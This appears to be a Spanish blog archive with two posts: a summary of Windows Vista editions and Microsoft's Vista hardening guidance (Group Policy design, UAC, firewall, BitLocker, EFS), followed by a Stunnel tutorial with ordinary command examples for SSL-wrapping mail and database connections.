El nuevo sistema de Microsoft aprovechará la alta conectividad mediante ADSL y cable de los usuarios para integrar las nuevas aplicaciones Windows Live! que vivirán entre el escritorio del Win Vista y el medio online.

De esta manera aplicaciones como el correo electrónico (Windows Live Mail), los favoritos (Windows Live Favorites), la mensajeria instantanea (Windows Live Messenger) o la geolocalización (Windows Live Local) se complementarán unos a otros tanto en linea como directamente en el escritorio del usuario.

Windows Vista esta en 5 versiones distintas:
· Windows Vista Home Basic Edition. (Equivale al Windows XP Home Edition) Incluye el Windows Firewall, control parental, el Security Center, el Movie Maker, el Photo Library, entre otros. * Para los recién iniciados.
· Windows Vista Home Premium Edition. Incluye todo lo que tiene el Windows Vista Home Basic. Agrega autoría de DVD Video, soporte para HDTV y soporte para la extracción de DVD. Similar al actual Windows XP Media Center pero con funciones añadidas.
· Windows Vista Business Edition. Diseñado para las pequeñas empresas sin personal IT. Soporte para copias de seguridad, ShadowCopy, conexión remota a servidores y PC fax. Acceso prepagado a la suscripción de servicios de Windows Live! Small Business o Microsoft Office Live!.
· Windows Vista Enterprise Edition. Optimizado para la empresa. Trae el VirtualPC y soporte para interfaz multi-lenguaje (MUI). Dirigido a fabricantes y trabajadoras en tecnología de la información.
· Windows Vista Ultimate Edition. El mejor sistema operativo ofrecido jamás para un PC personal. Software para podcasting, gestor para mejoras el rendimiento en juegos, posibles descargas gratuitas de música y películas.

II. SÍNTESIS.
En la guia de fortalecimiento de Windows Vista publicada por Microsoft se busca que la guía cumpliera las siguientes expectativas:
· Probada. Basándose en la experiencia del personal que realizo la guia.
· Confiable. Ofrece el mejor asesoramiento disponible.
· Exacto. Técnicamente probado y validado.
· Aplicable. Proporciona los pasos para el éxito.
· Real. Toma en cuenta los problemas del mundo real en seguridad.

NUEVAS CARACTERÍSTICAS DE WINDOWS VISTA.
· La versión de Windows más segura jamás creada con Windows Defender y Firewall de Windows (en inglés)
· Encuentra al instante lo que necesitas con la característica Búsqueda instantánea y Windows Internet Explorer 7
· Elegante escritorio con Aero de Windows con barras de menús transparentes como el cristal, Flip 3D (en inglés) y miniaturas dinámicas
· La mejor elección para los equipos portátiles con el Centro de movilidad de Windows (en inglés) y compatibilidad con Tablet PC (en inglés)
· Colabora y comparte documentos con el Área de encuentro de Windows (en inglés)
· Disfruta de fotos y entretenimiento en tu sala de estar con Windows Media Center
· Disfruta de Windows Media Center en toda la casa con Media Center Extenders
· Usa la protección contra errores de hardware con las características Copias de seguridad y Restauración de Windows Complete PC (en inglés)
· Usa la copia de seguridad programada para realizar automáticamente copias de seguridad de tus archivos
· Conectividad de red empresarial sin complicaciones con el Centro de redes (en inglés) y el Escritorio remoto (en inglés)
· Protege mejor tus datos frente a posibles pérdidas con el Cifrado de unidad BitLocker de Windows (en inglés)
· Crea DVD fácilmente con Windows DVD Maker
· Diviértete más con tu PC con tres juegos nuevos de primera: Maestros del ajedrez, Inkball y Maestros de Mahjong
· Crea películas de alta definición con Windows Movie Maker en alta definición (en inglés)

HARDENING WINDOWS VISTA
La Guía de Seguridad de Windows Vista proporciona recomendaciones para fortalecer el Sistema Operativo para los dos siguientes entornos:
· Enterprise Client (EC). Los equipos cliente en este ambiente se encuentra en un dominio que utiliza Active Directory y sólo necesitan comunicarse con sistemas que ejecutan Windows Server 2003. Los equipos cliente en este entorno incluyen una mezcla: equipos en Windows Vista y Windows XP. Basada en "Implementing the Security Baseline" y "Security Group Policy Settings."
· Specialized Security – Limited Functionality (SSLF). Seguridad Especializada y Funcionalidad limitada(SSLF). La preocupación por la seguridad en este entorno es tan grande que una pérdida de la funcionalidad y facilidad de administración es aceptable.

APLICACIÓN DE LA BASE DE SEGURIDAD
La finalidad de este parte es mostrar cómo configurar las opciones de seguridad a fortalecer los equipos cliente que ejecutan el sistema operativo por defecto que se unen a un dominio de Active Directory usando el servicio de directorio.

Antes de esto Microsoft basaba la seguridad en la importación de Seguridad de plantilla. Inf y extenso manual de modificación de las Plantillas administrativas parte de varios GPOs.

Para iniciar es necesario:
· Crear una unidad de organizacional (OU) y la estructura de su entorno.
· Ejecute el GPOAccelerator.wsf script.
· Utilice la Consola de Administración de Políticas de Grupo (GPMC) para enlazar y gestionar los GPOs.

La línea de base GPOs proporciona una combinación de la configuración de prueba de que aumentar la seguridad para los equipos cliente que ejecutan Windows Vista en el ambiente
Enterprise Client (EC).

Seguridad diseño y ejecución
· OU diseño de las políticas de seguridad
· GPO diseño de las políticas de seguridad
· Aplicación de las políticas de seguridad

a. OU diseño de las políticas de seguridad.
OU es un contenedor dentro de un dominio que utiliza Active Directory.

Usted puede enlazar un GPO a una OU, que luego se aplican los ajustes de la GPO a los usuarios y equipos que figuran en el que OU y su hijo OUs. Puede delegar el control de un grupo o una persona OU mediante el uso de la Delegación Wizard en la Microsoft Management Console (MMC) de Active Directory complemento Usuarios y equipos de herramienta.

Uno de los principales objetivos de una OU diseño para cualquier entorno es proporcionar una base para una perfecta aplicación de grupo que se aplica a todos los equipos cliente en Active Directory.

b. GPO diseño de las políticas de seguridad.
Un GPO es una colección de configuración de Directiva de grupo que son esencialmente los archivos creados por el Grupo de Política de complemento.

Las configuraciones se almacenan en el nivel de dominio y afectan a usuarios y equipos que figuran en sitios, dominios y OUs.

Puede usar GPOs para asegurar que la política de ajustes específicos, los derechos del usuario, el comportamiento y la informática se aplican a todos los equipos cliente o usuarios en una OU

La figura anterior muestra el orden de precedencia en que GPOs se aplican a un equipo que es miembro de la OU Niño, desde el más bajo orden (1) a la orden más alto (5).

Opciones:
· Puede configurar un Active Directory, sitio, dominio o OU con la opción Bloquear la herencia.
· El Grupo de Política de loopback característica le da al administrador la posibilidad de aplicar la configuración de Directiva de grupo de usuario basada en la computadora a que el usuario está conectado.

Para aplicar la OU diseño descritas anteriormente exige un mínimo de cuatro GPOs:
· Una política para el dominio
· Una política para los usuarios de Windows Vista OU
· Una política para el Desktop OU

En la siguiente figura se expande sobre el anteproyecto OU estructura para mostrar la relación que existe entre estos GPOs y diseño de la OU.

En el ejemplo de la figura, computadoras portátiles son miembros de la Laptop OU. La primera política que se aplica es la política de seguridad local en la computadoras portátiles. Debido a que sólo hay un sitio en este ejemplo, no se aplica GPO a nivel de sitio, lo que deja el dominio GPO como la próxima política que se aplica.

c. Aplicación de las políticas de seguridad.
La aplicación de la concepción de seguridad para los dos entornos descritos en esta guía requiere que use la Consola de Administración de Políticas de Grupo (GPMC)

así que usted no tiene que descargar e instalar la consola cada vez que se necesitan para administrar GPOs en un equipo diferente.
para los sistemas operativos Windows anteriores, la orientación normativa en esta guía para Windows Vista gran automatiza el proceso para poner a prueba la seguridad y aplicar el diseño para el medio ambiente CE

Para aplicar el diseño de la seguridad, hay tres tareas fundamentales para completar:
· Crear entorno de la CE.
· Utilice el GPMC para vincular la VSG CE a la política de dominio de dominio.
· Utilice el GPMC para ver sus resultados.

PROTEGIENDO VISTA CONTRA AMENAZAS.
Windows Vista incluye varias nuevas tecnologías que puede utilizar para ayudar a aumentar la protección contra virus y otras amenazas cibernéticas para los equipos que ejecutan Windows Vista en su entorno.

Internet Explorer ® 7 también incluye varias mejoras que ayudan a proteger contra virus y otras amenazas cibernéticas, tecnologías que ayudan a prevenir la instalación de software no deseado, y tecnologías que ayudan a proteger contra la transmisión no autorizada de datos personales aumentar en gran medida la seguridad del navegador y protección de la intimidad.

Las siguientes nuevas y mejores tecnologías de seguridad en Windows Vista e Internet Explorer 7:

a. Windows Vista defense Technologies.

Estas tecnologías incluyen:
· User Account Control (UAC)
Se puede configurar la configuración de la UAC en la siguiente ubicación: Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options Configuración del equipo \ Configuración de Windows \ Configuración de seguridad \ Políticas locales \ Opciones de seguridad

· Windows Defender.
Windows Defender es un programa incluido en Windows Vista, ayuda a proteger a los ordenadores contra pop-ups, de bajo rendimiento, y las amenazas a la seguridad causados por el spyware y otros software no deseado.

También ayuda a detectar y eliminar aplicaciones no deseadas, tales como el adware, los keyloggers, y el spyware. Esta vigilancia aumenta la fiabilidad de los equipos que ejecutan Windows Vista, está habilitado de forma predeterminada en Windows Vista,

· Windows Firewall.
El firewall de Windows Vista está activado por defecto para ayudar a proteger el ordenador del usuario tan pronto como el sistema operativo está en funcionamiento. Además, por primera vez en un sistema operativo de Windows, Windows Vista se integra el Protocolo de Internet (IPsec).
Las opciones avanzadas de Windows Firewall manejan los siguientes perfiles:
i. Domain Profile. Este perfil se aplica cuando una computadora está conectada con una red y authentica a un regulador del dominio en el dominio a el cual la computadora pertenece.
ii. Public Profile. Este perfil es el tipo de la localización de la red del defecto cuando la computadora no está conectada con un dominio. Los perfiles públicos son más restrictivos.
iii. Private Profile. Este perfil se aplica solamente si un usuario con privilegios locales del administrador lo asigna a una red publica fijada previamente. Microsoft recomienda solamente el hacer de esto para una red confible.

· Windows Security Center (WSC)
La característica WSC funciona como proceso de fondo en las computadoras categorías importantes de la seguridad:
i. Firewall
ii. Automatic Updates
iii. Malware protection
iv. Other security settings

· Herramienta de eliminación de software malintencionado.
Cada mes, Microsoft lanza una nueva versión de la herramienta a través de la actualización de Microsoft, de la actualización de Windows, de WSUS, y del centro de la transferencia directa de Microsoft. Cada mes, Microsoft lanza una nueva versión de la herramienta a través de la actualización de Microsoft, de la actualización de Windows, de WSUS, y del centro de la transferencia directa de Microsoft.

· Las políticas de restricción de software
Proveen a los administradores una manera de identificar software de uso y de controlar su capacidad de funcionar en las computadoras locales.

Las políticas de la restricción del software integran completamente con el directorio activo y agrupan la política, puede utilizar políticas de la restricción del software para lograr el siguiente:
Control del software en las computadoras del cliente.
Restringir el acceso a los archivos específicos en las computadoras multiusos.
Evite que los ficheros ejecutables funcionen en las computadoras locales.

b. Internet Explorer 7
Las nuevas tecnologias de seguridad de Internet Explorer 7 incluyen:
· Modo de proteccion de Internet Explorer
· ActiveX Opt-in
· Cross-domain scripting attack protection (verificación de originalidad de Sitios Web)
· Security Status Bar (autenticación de sistios web)
· Phishing Filter au
· Caracteristicas adicionales de seguridad

Caracteristicas adicionales de seguridad incluyen: restricción de add-ons, Binary Behavior Security Restriction ( verifica componentes binarios encapsulados en HTML), Consistent MIME Handling (manejo de procedimientos de las MIME), MIME Sniffing Safety Feature (previene la modificacion de un archivo a uno mas peligroso), MK Protocol Security Restriction (reduce la superficie de ataque bloqueando el protocolo MK), Network Protocol Lockdown (previene del contenido activo), Object Caching Protection (proteccion del cache), Protection From Zone Elevation, restricción de instalacion de ActiveX, restricción de descarga de archivos y Scripted Windows Security Restrictions (restricción de pop ups)

Mandatory Integrity Control
Windows Vista ha dividido en cuatro niveles de integridad las características de todos los procesos y objetos del sistema, con lo que ningún objeto o proceso de nivel de integridad inferior podrá acceder a ningún otro objeto que tenga un nivel de integridad superior. Esto lleva a que por ejemplo, ningún programa que esté corriendo con nivel de Integridad Medio, ejecutado por un administrador, podrá acceder a un objeto de nivel de Integridad Alto de Sistema. Para ello se tendría que hacer correr el proceso con el nivel de Integridad Alto de Sistema. Esto tiene su expresión más visible en el Modo Protegido de Internet Explorer 7, que corre dos procesos, uno con nivel de integridad bajo, que es el expuesto a Internet y otro con nivel de integridad medio que es el que controla al primero.

PROTEGIENDO INFORMACIÓN SENSIBLE
Cada año, cientos de miles de computadoras sin las debidas medidas de seguridad en sus datos, son perdidos, robados, o indebidamente retirados de todo el mundo.
Las siguientes características y servicios para satisfacer mejor las necesidades de protección de sus datos:
· BitLocker Drive Encryption
· Encrypting File System (EFS) Sistema de archivos de cifrado
· Rights Management Services (RMS)
· Control de Dispositivos

BitLocker Drive Encryption.
Ayuda a proteger los datos en un ordenador cliente. Todo el volumen se cifra para prevenir que usuarios no autorizados puedan romper el sistema de ficheros de Windows y de la protección, o la visualización de información fuera de línea en la unidad.

BitLocker Drive Encryption puede bloquear la normal secuencia de arranque hasta que el usuario suministra un número de identificación personal (PIN) o código inserta un llavero USB que contiene las claves de codificación. La máxima protección se obtiene cuando la computadora tiene un Trusted Platform Module (TPM 1.2) para proteger los datos del usuario, y para ayudar a garantizar que un equipo cliente que ejecuta Windows Vista no puede ser alterada mientras el sistema está fuera de línea. BitLocker está disponible en el Windows Vista Enterprise y Ultimate.

Sistema de archivos de cifrado (EFS)
Se puede utilizar EFS para cifrar los archivos y las carpetas para ayudar a proteger los datos contra el acceso no autorizado.

EFS está integrado en el sistema de archivos NTFS y su funcionamiento es completamente transparente a las aplicaciones.

Cuando un usuario o un programa intenta acceder a un archivo encriptado, el sistema operativo automáticamente los intentos de adquirir una clave de descifrado por el contenido y, a continuación, silenciosamente realiza el cifrado y descifrado en nombre del usuario. Las siguientes son las nuevas características de Windows Vista para EFI:
· Puede almacenar las claves de usuario de las tarjetas inteligentes.
· Puede almacenar claves en la recuperación de las tarjetas inteligentes, que permiten asegurar la recuperación de los datos sin una estación dedicada recuperación, incluso durante los períodos de sesiones de escritorio remoto.
· Puede codificar el archivo de paginación de Windows usando EFI con una clave que se genera cuando se inicie el sistema. Esta llave se destruye cuando el sistema se apaga.
· Puede cifrar la caché de Archivos sin conexión con EFI.
· Puede utilizar EFS para evitar que un lectura de archivos cifrados a través de otros sistemas operativos que requieren por el atacante obtener una clave capaz de descifrar el contenido.
· Puede utilizar EFS para proporcionar encriptación en varios discos y carpetas compartidas en la red.

Microsoft recomienda utilizar BitLocker y EFI en combinación para maximizar la protección de datos.

Rights Management Services
Diseñado para proporcionar seguridad y encargados de hacer cumplir la política de uso delicado para el correo electrónico, documentos, contenido Web y otros tipos de información. RMS proporciona la seguridad de la información encriptando la información a fin de que la persistencia de un archivo o como mensaje de correo electrónico se transmite a través de la empresa o por Internet, sólo los que están autenticados y expresamente autorizado a acceder a ella puede hacerlo. Hay tres componentes de RMS:
· RMS server .
· RMS client .
· RMS platform or application .

Control de Dispositivos.
Los dispositivos plug and play (USB, Stick memory, etc.)son un elemento de riesgo para el robo de información.
Windows Vista le permite los administradores utilizar la política del grupo para ayudar a adminstrar la instalación de dispositivos sin autorización, a través de las politicas de grupo:
· De instalacion: Computer Configuration\Administrative Templates\System\Device Installation\Device Installation Restrictions
· De uso: Computer Configuration\Administrative Templates\System\Removable Storage Access
· De auto run y auto play: Computer Configuration\Administrative Templates\Windows Components\AutoPlay Policies.

Firmado de Drivers
El firmado de los drivers que se exige en las plataformas de 64 bits tiene como principal objetivo garantizar la no inclusión de rootkits o troyanos no deseados en modo kernel en el sistema operativo, pero al mismo tiempo busca obtener una garantía de calidad de aquellos que sí deben ser instalados y así mejorar la fiabilidad del sistema.

Tecnologías de protección
Las tecnologías para evitar que se produzca una explotación de una vulnerabilidad de buffer overflow son varias, pero hay dos que son especialmente significativas: DEP (Data Execution Prevention) y ASLR (Address Space Layout Randomization). Ambas incluidas en Windows Vista.

SuperFetch
SuperFetch no es una tecnología que parta de cero, sino que complementa a otra ya existente en Windows XP llamada Prefetch y que en español vendría a significar "precarga".
Prefetch es un término usado en diferentes ámbitos de la informática, por ejemplo se habla de prefetch refiriéndose a las capacidades de los microprocesadores de cargar anticipadamente datos en la cache L1 durante la ejecución de una instrucción con el fin de acelerar al ejecución de aplicaciones, en el ámbito de los navegadores WEB se conoce como Prefetch (concretamente como Link Prefetching) a la capacidad de estos de cargar en caché información de las páginas Web enlazadas cuando el navegador esta inactivo con el fin de acelerar la navegación (pudiendo realizar esto de manera agresiva o solo cuando le es indicado en el código html de link), en programación se hace referencia a este termino apuntando a la precarga de información en memoria antes de que sea necesaria con el fin de ganar tiempo de ejecución y por último en sistemas hablamos de Prefetch como un sistema de gestión de memoria usado en varios sistemas operativos (también esta disponible en Linux) que permite optimizar notablemente la carga de aplicaciones y servicios especialmente al arranque del equipo precargando la información de estos en memoria y reduciendo por tanto el tiempo de inicio.

SuperFetch es un servicio disponible en todas las versiones de Windows Vista y hace un uso intensivo de la memoria partiendo del concepto de que es muy común hoy en día trabajar con gran cantidad de memoria libre en los equipos modernos, para resolver este desaprovechamiento de memoria Windows Vista carga en esta toda aquella información que probablemente utilizará el usuario, para ello mantiene un historial de su comportamiento por días de la semana e incluso por horas de tal manera que cuando desee abrir alguna aplicación concreta esta se encuentre ya cargada en memoria y el proceso de apertura sea mucho más rápido, aun que como es obvio para uso efectivo de SuperFetch se requiere memoria libre suficiente (de ahí las recomendación de 1GB de RAM).

ReadyBoost y ReadyDrive
ReadyBoost es un nuevo sistema incluido en Windows Vista que consigue mejorar el rendimiento del equipo haciendo uso de la mayor tasa de transferencia en búsquedas aleatorias y menor latencia de la memoria flash con respecto al disco duro, de este modo podemos usar dispositivos como llaves USB, memorias SD o Compact Flash para guardar información de caché del disco duro.

ReadyDrive que aplica un concepto emejante al de ReadyBoost pero a los discos duros híbridos (discos duros provistos de una caché flash).

COMPATIBILIDAD DE APLICACIONES.
Una gran parte del esfuerzo de desarrollo para Windows Vista garantiza que las nuevas características y servicios en el sistema operativo de mantener un alto nivel de funcionalidad y la compatibilidad con programas antiguos.

El Microsoft Solution Accelerator para Business Desktop Deployment (BDD) 2007 contiene amplia compatibilidad de las aplicaciones de orientación para permitir a los profesionales de TI a prueba de las solicitudes de compatibilidad con Windows Vista, y mitigar los problemas de compatibilidad descubiertas durante el proceso.

Accesorios de Seguridad.
User Account Control, proporciona un método estándar de separación de los privilegios de usuario y las tareas de las que requieren de administrador.
Protected Mode, esta nueva característica de Microsoft Internet Explorer 7 ayuda a proteger los equipos que ejecutan Windows Vista de la instalación de malware y otros programas dañinos ejecutando el sistema operativo con más bajos y la seguridad de los derechos.

Cambios e innovaciones que pueden causar problemas de compatibilidad con aplicaciones de terceros:
· Nuevo sistema de APIs.
· Windows Vista 64-Bit .
· Versiones del sistema operativo muy antiguas

Asistente de Compatibilidad
Esta función automáticamente especifica un "modo de compatibilidad" de las aplicaciones diseñadas para funcionar con las versiones anteriores de Windows. Cuando Windows Vista detecta las aplicaciones que necesitan para funcionar en los modos de compatibilidad para Windows XP, Windows 2000 o versiones posteriores de Windows, el sistema operativo dirige las aplicaciones que se actualizan automáticamente para funcionar en Windows Vista, sin más intervención del usuario.

Application Compatibility Toolkit
ACT está diseñado para ayudarle a reducir los costos y el tiempo que para resolver cuestiones de compatibilidad de las aplicaciones mejor le permiten desplegar rápidamente Windows Vista.

SEGURIDAD ESPECIALIZADA.
A pesar de que la configuración de este entorno proporciona un mayor nivel de seguridad para los datos y la red, sino que también impide que se ejecuten algunos de los servicios que su organización pueda requerir. Ejemplos de esto son los Servicios de Terminal Server, que permite a varios usuarios a conectarse interactivamente a los escritorios y las aplicaciones en los equipos remotos, y el servicio de fax, que permite a los usuarios enviar y recibir faxes a través de la red utilizando sus computadoras.

La configuración de estos parámetros se ha desarrollado para las organizaciones donde la seguridad es más importante que la funcionalidad.

Algunas organizaciones especializadas, como las de los militares, los gobiernos estatales y locales, y las finanzas son necesarias para proteger a algunos o todos los servicios, sistemas, y los datos que se utilizan con un nivel de seguridad especializados. El SSLF base de referencia está diseñada para proporcionar este nivel de seguridad para esas organizaciones.
SSLF puede reducir la funcionalidad en su entorno. Esto se debe a que sólo se limita a los usuarios de las funciones específicas que se requieren para completar las tareas necesarias. El acceso se limita a las solicitudes aprobadas, los servicios, las infraestructuras y entornos. Las áreas de mayor seguridad y funcionalidad limitada que la SSLF de referencia aplica:
· Servicios de acceso restringido y el acceso a los datos
· Limitado acceso a la red
· Fuerte protección de la red

Servicios de acceso restringido y el acceso a los datos
Deshabilitar las cuentas de administrador,gantizar el cumplimiento de los requisitos más fuertes contraseña, exigir más estricta la política de bloqueo de cuenta, exigir que la política más estricta para los siguientes ajustes de Asignaciones de Derechos de Usuario como Inicie la sesión como un servicio y Iniciar sesión como Batch.

Limitado acceso a la red
Configuración de opciones en el SSLF línea de base que aumentan la seguridad de la red, pero podría evitar que los usuarios acceso a la red son: limitar el acceso a los sistemas cliente a través de la red, ocultar los sistemas de navegar por las listas, control de excepciones de Windows Firewall y llevar a la práctica seguridad de conexión, como la firma de paquetes.

Fuerte protección de la red
Configuración de opciones en el SSLF de referencia que ayuda a prevenir ataques de DoS, las que incluyen: proceso de control de las asignaciones de cuotas de memoria, control objeto su creación, control de la capacidad de depuración de programas y proceso de control de perfiles.

III. ANÁLISIS
Las organizaciones que utilizan los ordenadores y las redes, sobre todo si se conectan a los recursos externos, como la Internet, deben abordar las cuestiones de seguridad en el sistema y el diseño de redes, y cómo configurar y desplegar sus equipos. Capacidades que incluyen la automatización de procesos, gestión remota, acceso remoto, disponibilidad las 24 horas del día, en todo el mundo el acceso, la independencia de dispositivo y el software permitirá a las empresas a ser más racional y productivo en un mercado competitivo. Sin embargo, estas capacidades también exponer a los ordenadores de estas organizaciones a los posibles compromiso.

En general, los administradores deben tener cuidado cuidado para prevenir el acceso no autorizado a datos, la interrupción del servicio, y el uso indebido de computadoras.

En caso de un ataque a los servidores en su entorno es lo suficientemente grave, que podría dañar a toda la organización. Por ejemplo, si el malware infecta a los equipos cliente en la red, su organización podría perder propiedad de los datos, y la experiencia significativa de los gastos generales a regresar a un estado seguro. Un ataque que hacen de su página web fuera de servicio también podría resultar en una importante pérdida de ingresos o de la confianza de los clientes. Este trabajo pretende explicar las contramedidas disponibles en Windows Vista.

IV. CONCLUSIÓN.
La seguridad de Windows Vista se basa en la seguridad de cualquier otro sistema operativo, para lo cual es necesario considerar que normalmente se utilizara como cliente.

Ademas de los puntos de fortalecimiento ya vistos en otros sistemas operativos de Windows, Vista ofrece el mayor seguridad en los siguientes aspectos.
A. Control de Cuentas de usuario, mediante la herramienta UAC.
B. Firmado de Drivers.
C. Fortificación de Servicios
D. La protección contra Desbordamientos de Buffer en Windows Vista, a través de la Prevención, Detección, No ejecución de Datos y Ocultación de Información.
E. Cifrado de datos con Bitlocker.
F. Administración de los recursos de memomria con SuperFetch
G. Administración de politicas de grupo: LGPO en Windows Vista
H. Firewall de Windows Vista.
I. Seguridad en Web con Internet Explorer 7.

V. REFERENCIAS.

www.microsoft.com/spain www.microsoft.com/windowsvista
Windows Vista Security Guide
Threats and Vulnerabilities Mitigation
Secure Configuration Assessment and Management
Libro.
Microsoft, Windows Security, Resource Kit, Ben Smith y Brian Komar.
Microsoft 2005.
http://www.microsoft-watch.com/
Best practices:Windows Vista

http://searchwindowssecurity.techtarget.com/
15 steps to hardening Windows Server 2003

http://technet.microsoft.com/es-mx/

Seguridad en Windows Vista.
Características de Seguridad
de Windows Vista
http://www.trucoswindows.net/
Windows Vista
http://techrepublic.com.com/2001-6240-0.html
10 things you should know about Windows Vista's service hardening
www.segu-info.com.ar

Las novedades de Windows Vista en Seguridad
http://www.diarioti.com/gate/

Windows Vista potenciará la seguridad como estrategia de ventas

STUNNEL

2008-02-27T05:49:00.000-08:00

INTRODUCCION

Stunnel es un programa muy útil que nos permite utilizar conexiones SSL con clientes y/o servidores que no soportan este protocolo. Algunos ejemplos de uso son:

Utilizar el modo de conexión SSL entre un cliente que tenga esa opción y un servidor POP o IMAP que no.
Utilizar el modo de conexión SSL entre un Servidor que tenga esa opción y un cliente POP o IMAP que no.
Encriptar cualquier conexión TCP entre dos ordenadores, permitiendo opcionalmente el control de acceso al servidor desde determinados clientes.

SINTESIS

Stunnel debe ejecutarse en el extremo de la conexión donde se quiera tener la funcionalidad SSL que de otra forma no se tiene. Así, en el primero de los ejemplos anteriores, habría que ejecutarlo en el servidor POP/IMAP. En el caso de IMAP la orden sería:

stunnel -d 993 -r 143

La opción -d indica en qué puerto debe escuchar. En este caso, puesto que hemos supuesto que el cliente soporta IMAP sobre SSL, el puerto debe ser 993, que es el asignado para ello (IMAPS). La opción -r indica a qué host y puerto debe redirigir la conexión (ésta última ya no es SSL). Si no se indica host se conecta a sí mismo. En este ejemplo es el puerto habitual de IMAP.

Otra forma de hacerlo es:

stunnel -d 993 -l /usr/sbin/imapd – imapd

En este caso no redirige la conexión al puerto estandar de IMAP, sino que el mismo stunnel se encarga de lanzar el servidor, asumiendo así el mismo papel que inetd. En este caso el programa servidor debe soportar ese modo de ejecución (via inetd, no abriendo la conexión por sí mismo). Tras el doble guión se pone lo mismo que en el fichero inetd.conf tras el nombre del ejecutable.

Si el extremo de la conexión donde no tenemos un software SSL es el cliente, también podemos usar SSL. En este caso hay que ejecutar, en la máquina cliente:

stunnel -c -d 1999 -r sslserver:puerto-s

Y configuramos el cliente para que se conecte a locahost al puerto 1999.

Lo importante a recordar a es que:
En modo servidor (cuando no se usa la opción -c), la conexión entrante (por el puerto dado en -d) es SSL, y la que genera stunnel (dada por -r) no lo es.
En modo cliente ocurre justo lo contrario.

Podemos también encriptar cualquier conexión en la que ni cliente ni servidor sean SSL. Por ejemplo, para encriptar la conexión IMAP entre un lector de correo de PC y un servidor:
En el cliente:
stunnel -c -d 143 -r servidor_imap:1999

Habrá que configurar el programa de correo para indicarle que el servidor IMAP es el propio PC (una de las cosas buenas de stunnel es que tiene una versión casi totalmente funcional para PC).
En el servidor:
stunnel -d 1999 -r localhost:143

Aquí también hemos cogido un puerto aleatorio (1999) para la conexión encriptada. Este último caso es lo mismo que se puede conseguir con SSH de la forma:
ssh -L 143:servidor_imap:143 servidor_imap

La ventaja de stunnel es que no hay que tener una cuenta de la máquina remota. Debe ser el administrador de la misma (o nosotros si tenemos allí cuenta) quien arranque el servidor stunnel. No hay que indicarle a SSH un puerto aleatorio porque todo el tráfico encriptado va por la conexión que se establece con el servidor.

CERTIFICADOS
Cuando stunnel funciona en modo servidor, debe presentar un certificado al cliente, como todo servidor SSL. La distribución de stunnel trae uno, pero es conveniente generar uno propio, usando OpenSSL por ejemplo. La clave privada debe residir en un fichero no encriptado para que el programa pueda acceder a ella sin tener que pedir clave. Lo mismo cabe decir si se van a usar certificados en modo cliente, para su autentificación. Esto es un problema importante de seguridad, sobre todo en el caso de un PC, donde cualquier con acceso al mismo podrá acceder a la clave privada. Estaría bien que el programa soportara tenerla encriptada y contemplara formas de acceder a la misma al arrancar, como hace mod_ssl (como pedir la frase de paso al usuario, obtenerla mediante un programa o variables de entorno, etc.).

La autentificación de cliente puede imponerse ejecutando el servidor con la opción -v, cuyo argumento indica el nivel de autentificación exigido. Los valores que puede tomar son:
El cliente puede presentar o no un certificado. Si lo hace, comprobar que es válido.
El cliente debe presentar un certificado, que es verficado por el servidor. Si no es válido no acepta la conexión.
El cliente debe presentar un certificado, el cual debe ser figurar en una lista de certificados válidos almacenados en el servidor.

Un certificado se considera válido cuando va firmado por un CA cuyo certificado conozca el servidor (por tanto no aceptará certificados de cliente auto-firmados).

Estos pueden residir uno en cada fichero o todos en el mismo. En el primer caso, los nombres de los certificados deben tener nombres del tipo XXXXXXXX.0 (generados con openssl x509 -hash), y el nombre del directorio se le pasa a stunnel con la opción -a. Para el segundo caso (todos en el mismo fichero), se usa la opción -A.

Estas opciones nos pueden servir para implementar un control de acceso, para lo cual también se puede utilizar el control de TCP Wrappers, si stunnel se compiló con soporte para ello.

FORMAS DE FUNCIONAMIENTO
Ya hemos visto que stunnel puede actuar como cliente o como servidor. Estos roles se refieren a conexiones SSL, porque el cliente también puede ser servidor de conexiones no-SSL (opción -d), y el servidor puede ser cliente (opción -r).

En el caso del cliente, hay tres fuentes de las que puede obtener la conexión a enviar por el canal SSL:
Opción -d (modo daemon)
Por inetd. Un ejemplo de entrada en inetd.conf es:
servicio stream tcp nowait root /usr/local/sbin/stunnel \
stunnel -c -r host:puerto-s
En este caso no es necesario usar la opción -d porque obviamente la conexión se la da abierta inetd. Esta forma tiene el inconveniente de la lentitud por el arranque del programa en cada conexión.
Mediante un programa externo (con -l). En este caso son la entrada/salida estandar del programa lo que se envía por la conexión SSL:
stunnel -c -r server:puerto-s -l /.../programa

Lo que sí es obligatorio en el caso del cliente es la opción -r, para indicar a qué servidor y puerto SSL hay que conectarse.

En el caso del servidor, puede obtener la conexión SSL de dos fuentes:
Opción -d (modo daemon).
Por inetd, como en el caso anterior.
servicio-s stream tcp nowait root /usr/local/sbin/stunnel \
stunnel -r host:1999

El servidor puede conectarse a un destino de dos formas:
Opción -r
A un programa externo:
stunnel -d puerto-s -l /.../programa
En este caso se conecta con las entrada/salida estandar del programa.

La opción -L es semejante a -l, pero en este caso se abre un pseudo-tty para ejecutar el programa y es el descriptor esclavo del mismo el que se conecta. Esto se usa para encriptar conexiones PPP. En resumen:

Origen Destino
Cliente (-c) -d, -l, -L, inetd -r
Servidor -d, inetd -r, -l, -L

Si ejecutamos stunnel en el modo inetd, tenemos problemas en sistemas operativos, como Solaris, que no permiten pasar a un programa arrancado de esta forma más de 5 argumentos, por lo que si hay que usar la opción -p o -R (para indicar el fichero de datos aleatorios, si es necesario), puede que tengamos que compilar el programa con esos datos por defecto, de forma que no haya que pasárselos como argumentos.

APRENDIENDO A INICIAR STUNNEL
Es posible usar Stunnel para proporcionar una conexión segura entre bases de datos locales y remotas. Si usted tiene una base de datos en una máquina distinta a la que ubica el cliente psql, es posible proporcionar una conexión segura entre psql y la base de datos. Si su base de datos está ubicada en la misma máquina que el cliente psql, puede proporcionar una igualmente segura conexión entre los dos programas locales.

Debería haber un archivo llamado stunnel en su directorio Stunnel; este es el ejecutable del programa. Las instrucciones incluídas asumen que usted está usando el ejecutable desde este directorio, pero puede copiarlo a /usr/local/sbin, o a otra ruta de su elección. También, puede crear enlaces a este archivo en sus scripts de arranque para que sea automáticamente inicializado cuando el sistema arranque.

Si usa Stunnel con inetd, no necesitará llamarlo desde un script de arranque.

La ejecución de Stunnel en modo demonio es realmente simple, ya esté conectando a una base de datos local o remota. Para usar Stunnel para conectar a una base de datos local, debe iniciarlo como cliente y como servidor (dos procesos diferentes del mismo programa, cada uno corriendo en un puerto distinto). Luego instruirá a psql para que se conecte al número de puerto que el cliente stunnel está usando.

